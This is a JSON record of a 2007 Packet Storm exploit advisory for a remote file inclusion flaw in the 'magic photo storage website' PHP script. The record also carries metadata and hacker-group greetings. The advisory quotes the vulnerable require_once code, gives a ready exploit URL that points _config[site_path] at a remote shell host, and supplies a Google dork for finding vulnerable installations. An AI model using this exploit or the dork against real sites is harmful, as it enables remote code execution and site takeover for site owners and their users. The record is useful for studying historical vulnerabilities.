{"sourceHref": "https://packetstormsecurity.com/files/download/53542/mpsw-rfi.txt", "sourceData": "`######################################################################## \n# magic photo storage website -- Remote File Inclusion \n# Vendor : http://www.scriptaty.net/magic-photo-storage-website.html \n# Demo Site : http://www.turnkeydemos.info/demo/picstorage/ \n# Found By : k1tk4t - k1tk4t[4t]newhack.org \n# Location : Indonesia -- #newhack[dot]org @irc.dal.net \n######################################################################## \nfile; \ncommon_function.php \n \nbug; \nrequire_once $_config['site_path'] . '/class/session.class.php'; \nrequire_once $_config['site_path'] . '/class/validator.class.php'; \nrequire_once $_config['site_path'] . '/include/message.php'; \n######################################################################## \nexploit; \nhttp://localhost/include/common_function.php?_config[site_path]=http://shell \n######################################################################## \nDork; \nallinurl:catalog_login.php \n######################################################################## \nThanks; \nstr0ke \nxoron [www.xoron.biz] \n[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159 \nevilcode,illibero,NoGe,nyubi,x-ace,ghoz, \nhome_edition2001,matdhule,iFX,fusion \nand for all(friend's&enemy) \n@irc.dal.net \n#newhack[dot]org [all member&staff] \n#e-c-h-o [all member echo community] \n#asiahacker [all member asiahacker community] \n#nyubicrew [all member solpotcrew community] <-- at irc.komp-uter.org \n`\n", "edition": 1, "references": [], "modified": "2007-01-13T00:00:00", "hash": "144ba7fca2eaee6d4deceb0feddf1b2aa968e08f4ea53180eea044495bcd75df", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/53542/mpsw-rfi.txt.html", "description": "", "id": "PACKETSTORM:53542", "reporter": "k1tk4t", "lastseen": "2016-11-03T10:20:56", "published": "2007-01-13T00:00:00", "enchantments": {"score": {"value": 6.8, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-11-03T10:20:56"}, "vulnersScore": 6.8}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "mpsw-rfi.txt", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "968aedf7ce2f3469ca6125c61f438e45", "key": "href"}, {"hash": "2b02d7d717bb2c27086d7ca231237a84", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "2b02d7d717bb2c27086d7ca231237a84", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "3c5aad2e93276c3ca8b9ece3c115ca5b", "key": "reporter"}, {"hash": "ef1c3acc037634aff0d552bc58b4387b", "key": "sourceData"}, {"hash": "6f8bbce17301b512efc7090b13488de8", "key": "sourceHref"}, {"hash": "dd1fc3cc4f95c5c8c8a4ea0d7781767f", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}

{}